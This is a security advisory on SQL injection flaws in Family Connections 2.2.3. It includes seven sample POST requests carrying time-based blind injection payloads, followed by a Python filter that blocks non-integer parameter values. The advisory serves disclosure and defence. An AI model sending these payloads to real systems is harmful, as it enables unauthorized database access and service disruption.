Family Connections 2.2.3 Multiple SQL Injection Vulnerabilities
Info
| Bugtraq ID: | 40043 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 10 2010 12:00AM |
| Updated: | May 10 2010 12:00AM |
| Credit: | Salvatore Fresta aka Drosophila |
| Vulnerable: | Haudenschilt Family Connections 2.2.3 |
| Not Vulnerable: | |
Discussion
Family Connections is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Family Connections 2.2.3 is vulnerable; other versions may also be affected.
Exploit / POC
Attackers can use a browser to exploit these issues.
The following sample data is available:

POST /path/recipes.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/gallery/upload.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

category=(SELECT(IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)))


POST /path/addressbook.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

editsubmit=1&aid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/addressbook.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

edit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/calendar.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/familynews.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

submitedit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/familynews.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)

Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
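
With no vendor patch listed, one stopgap is a request filter that rejects non-integer values in the parameters the sample requests target. The following is an added example, not code from the advisory or from the Family Connections project; the endpoint and parameter names come from the sample requests above, while treating those parameters as integer IDs and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Endpoint -> parameters carrying the payload in the advisory's sample requests.
# Treating them as integer IDs is an assumption; the advisory does not say so.
NUMERIC_PARAMS = {
    "recipes.php": {"id"},
    "gallery/upload.php": {"category"},
    "addressbook.php": {"aid", "id"},
    "calendar.php": {"id"},
    "familynews.php": {"id"},
}
INT_RE = re.compile(r"-?[0-9]{1,10}")  # ASCII digits only, bounded length

def endpoint_key(path):
    """Return the NUMERIC_PARAMS key the request path ends with, or None."""
    path = path.split("?", 1)[0]
    for key in NUMERIC_PARAMS:
        if path == key or path.endswith("/" + key):
            return key
    return None

def violations(path, body):
    """List (name, value) pairs that should be integers but are not."""
    key = endpoint_key(path)
    if key is None:
        return []
    # parse_qsl percent-decodes, so encoded payloads are checked in decoded
    # form; every occurrence of a repeated parameter is checked, not just one.
    return [(n, v) for n, v in parse_qsl(body, keep_blank_values=True)
            if n in NUMERIC_PARAMS[key] and not INT_RE.fullmatch(v)]

def should_block(path, body):
    return bool(violations(path, body))

if __name__ == "__main__":
    # Constructed sample bodies (not captured traffic).
    samples = [
        ("/path/recipes.php", "delconfirm=1&id=42"),
        ("/path/calendar.php", "delconfirm=1&id=-1 OR IF(1=1,1,NULL)"),
        ("/path/addressbook.php", "edit=1&id=3&id=3%20OR%201"),
    ]
    for path, body in samples:
        print(path, "BLOCK" if should_block(path, body) else "allow",
              violations(path, body))
```

A filter like this only narrows exposure at the edge; the durable fix is for the application to bind these values through parameterized queries.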
References
- Family Connections Homepage (Family Connections)
- Family Connections 2.2.3 Multiple Remote Vulnerabilities (Salvatore Fresta aka Drosophila)